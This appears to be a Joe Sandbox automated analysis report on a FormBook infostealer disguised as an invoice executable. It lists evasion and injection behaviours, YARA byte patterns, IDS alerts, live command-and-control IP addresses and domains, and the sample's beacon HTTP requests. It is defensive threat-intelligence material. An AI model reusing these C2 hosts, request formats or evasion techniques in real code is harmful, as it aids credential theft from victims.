Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INV20240828.exe

Overview

General Information

Sample name:INV20240828.exe
Analysis ID:1501645
MD5:d609d71d66a4ad2aaeda58a4368c901b
SHA1:901dc6db4acba93ab9d7887dbf34d44b926b3f03
SHA256:a3546bc856390ff0cf93310ee45cf191d8db47bd52cbf90554d69c33f83ce985
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • INV20240828.exe (PID: 1352 cmdline: "C:\Users\user\Desktop\INV20240828.exe" MD5: D609D71D66A4AD2AAEDA58A4368C901B)
    • svchost.exe (PID: 5516 cmdline: "C:\Users\user\Desktop\INV20240828.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • umoPQplhJOFey.exe (PID: 5752 cmdline: "C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • chkntfs.exe (PID: 1100 cmdline: "C:\Windows\SysWOW64\chkntfs.exe" MD5: A9B42ED1B14BB22EF07CCC8228697408)
          • umoPQplhJOFey.exe (PID: 5780 cmdline: "C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1576 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2f6e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17742:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.4504655296.0000000002980000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.4504655296.0000000002980000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c2e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1433f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2403022417.00000000070F0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f6e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17742:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e8e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16942:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\INV20240828.exe", CommandLine: "C:\Users\user\Desktop\INV20240828.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\INV20240828.exe", ParentImage: C:\Users\user\Desktop\INV20240828.exe, ParentProcessId: 1352, ParentProcessName: INV20240828.exe, ProcessCommandLine: "C:\Users\user\Desktop\INV20240828.exe", ProcessId: 5516, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\INV20240828.exe", CommandLine: "C:\Users\user\Desktop\INV20240828.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\INV20240828.exe", ParentImage: C:\Users\user\Desktop\INV20240828.exe, ParentProcessId: 1352, ParentProcessName: INV20240828.exe, ProcessCommandLine: "C:\Users\user\Desktop\INV20240828.exe", ProcessId: 5516, ProcessName: svchost.exe

            Suricata Signatures

            Timestamp:2024-08-30T09:20:30.057598+0200
            SID:2855464
            Severity:1
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:19:39.365441+0200
            SID:2855464
            Severity:1
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:17:48.609900+0200
            SID:2855464
            Severity:1
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:18:20.514483+0200
            SID:2855464
            Severity:1
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:19:34.266715+0200
            SID:2855464
            Severity:1
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:19:50.047575+0200
            SID:2855464
            Severity:1
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:18:15.238657+0200
            SID:2855464
            Severity:1
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:18:28.752524+0200
            SID:2855464
            Severity:1
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:18:31.267914+0200
            SID:2855464
            Severity:1
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:19:20.766773+0200
            SID:2855464
            Severity:1
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:18:33.824371+0200
            SID:2855464
            Severity:1
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:17:39.801428+0200
            SID:2855464
            Severity:1
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:17:39.801428+0200
            SID:2856318
            Severity:1
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:17:37.239570+0200
            SID:2855464
            Severity:1
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:20:24.986401+0200
            SID:2855464
            Severity:1
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:20:08.488774+0200
            SID:2855464
            Severity:1
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:19:23.357921+0200
            SID:2855464
            Severity:1
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:18:56.175427+0200
            SID:2855464
            Severity:1
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:20:03.372374+0200
            SID:2855464
            Severity:1
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:20:27.508042+0200
            SID:2855464
            Severity:1
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:19:25.970333+0200
            SID:2855464
            Severity:1
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:19:52.600683+0200
            SID:2855464
            Severity:1
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:17:34.711102+0200
            SID:2855464
            Severity:1
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:18:52.878591+0200
            SID:2855464
            Severity:1
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:18:51.079658+0200
            SID:2855464
            Severity:1
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:17:53.688591+0200
            SID:2855464
            Severity:1
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:17:51.162581+0200
            SID:2855464
            Severity:1
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:19:55.132399+0200
            SID:2855464
            Severity:1
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:18:17.878924+0200
            SID:2855464
            Severity:1
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:19:36.788523+0200
            SID:2855464
            Severity:1
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-30T09:20:05.943803+0200
            SID:2855464
            Severity:1
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: INV20240828.exeVirustotal: Detection: 28%Perma Link
            Source: INV20240828.exeReversingLabs: Detection: 63%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4504655296.0000000002980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2403022417.00000000070F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4505559577.0000000002DA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4504355624.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4507474267.0000000004B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4505524370.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2396873201.0000000003FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: INV20240828.exeJoe Sandbox ML: detected
            Source: INV20240828.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: chkntfs.pdbGCTL source: svchost.exe, 00000002.00000002.2396389840.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364999216.0000000003627000.00000004.00000020.00020000.00000000.sdmp, umoPQplhJOFey.exe, 00000004.00000002.4505174087.0000000001318000.00000004.00000020.00020000.00000000.sdmp, umoPQplhJOFey.exe, 00000004.00000003.2336968292.000000000132B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: umoPQplhJOFey.exe, 00000004.00000000.2321112263.0000000000D8E000.00000002.00000001.01000000.00000005.sdmp, umoPQplhJOFey.exe, 00000006.00000000.2469139536.0000000000D8E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000002.00000003.2305991456.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2396528634.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2304116805.0000000003800000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000003.2404255905.00000000045CA000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000003.2401429685.0000000004411000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000002.4505750443.000000000490E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000002.4505750443.0000000004770000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000002.00000003.2305991456.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2396528634.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2304116805.0000000003800000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 00000005.00000003.2404255905.00000000045CA000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000003.2401429685.0000000004411000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000002.4505750443.000000000490E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000002.4505750443.0000000004770000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: chkntfs.pdb source: svchost.exe, 00000002.00000002.2396389840.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364999216.0000000003627000.00000004.00000020.00020000.00000000.sdmp, umoPQplhJOFey.exe, 00000004.00000002.4505174087.0000000001318000.00000004.00000020.00020000.00000000.sdmp, umoPQplhJOFey.exe, 00000004.00000003.2336968292.000000000132B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: chkntfs.exe, 00000005.00000002.4506411115.0000000004D9C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000005.00000002.4504718560.0000000002A18000.00000004.00000020.00020000.00000000.sdmp, umoPQplhJOFey.exe, 00000006.00000002.4505828352.000000000275C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2690302311.000000002A3FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: chkntfs.exe, 00000005.00000002.4506411115.0000000004D9C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000005.00000002.4504718560.0000000002A18000.00000004.00000020.00020000.00000000.sdmp, umoPQplhJOFey.exe, 00000006.00000002.4505828352.000000000275C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2690302311.000000002A3FC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0265C750 FindFirstFileW,FindNextFileW,FindClose,5_2_0265C750
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0265C886 FindFirstFileW,FindNextFileW,FindClose,5_2_0265C886
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 4x nop then xor eax, eax5_2_02649B00
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 4x nop then mov ebx, 00000004h5_2_044C04DE
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 4x nop then pop edi6_2_04BCEC8A
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 4x nop then pop edi6_2_04BD05F8
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 4x nop then mov esp, ebp6_2_04BCE610
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 4x nop then pop edi6_2_04BCF980
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 4x nop then xor eax, eax6_2_04BD4178

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49715 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49714 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49727 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49716 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49733 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49718 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.5:49716 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49735 -> 5.144.130.52:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49741 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49757 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49753 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49756 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49721 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49731 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49739 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49747 -> 218.247.68.184:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49729 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49749 -> 218.247.68.184:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49743 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49745 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49719 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49737 -> 5.144.130.52:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49728 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49752 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49755 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49732 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49740 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49744 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49751 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49748 -> 218.247.68.184:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49736 -> 5.144.130.52:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.asian-massage-us.xyz
            Source: DNS query: www.golbasi-nakliyat.xyz
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewIP Address: 45.33.23.183 45.33.23.183
            Source: Joe Sandbox ViewASN Name: HOSTIRAN-NETWORKIR HOSTIRAN-NETWORKIR
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xsf1/?KxdLgNi=/2dxOCr9e8Tu47VkPNo5dAI1prtgpWpDtJEt3c2Foz5fpzeoRIujBVjrDMsKHc70+0K9iVKA7vE9ZFCiM5OaHQ9FJ0pFhf/XXW3oapof9+b9s/jcWq68S+C05ai3yP+Fag==&lL2=1ZRtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.clientebradesco.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /12ts/?KxdLgNi=fK0TrVkIcECrXBt/QBT8PCmrckdVeV1vsNkWvaJ0XbQUSkAwNJoncWp26b1Q7HgZ6hy5g1l23+w5zEE84XOKO78C1JBbT4+4k1+SvQMP+iwoSoAbGtJFITlm6yZl6HBNXw==&lL2=1ZRtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.myim.cloudUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ftud/?KxdLgNi=CQmIz2bNYdnQtzE5dRZx19O+RKFjtfDUuZcFlqzFgfI5jfpPm1EP0eBYxBqCjdR2XMjWQLlFnnRrMqX4rM3bAk6hJ8rVDO8n3CpjeInC2PpnYB4d910sD/0oMC4edJRzog==&lL2=1ZRtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.d55dg.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /mkan/?lL2=1ZRtX&KxdLgNi=++BThBYRK05wjkBDkCMyqRU9EXa7XpQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQlnoxyYMQ/CoARoRTEZylvaiatUE6PHz4hBbvUaTHyaHkPw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.fineg.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
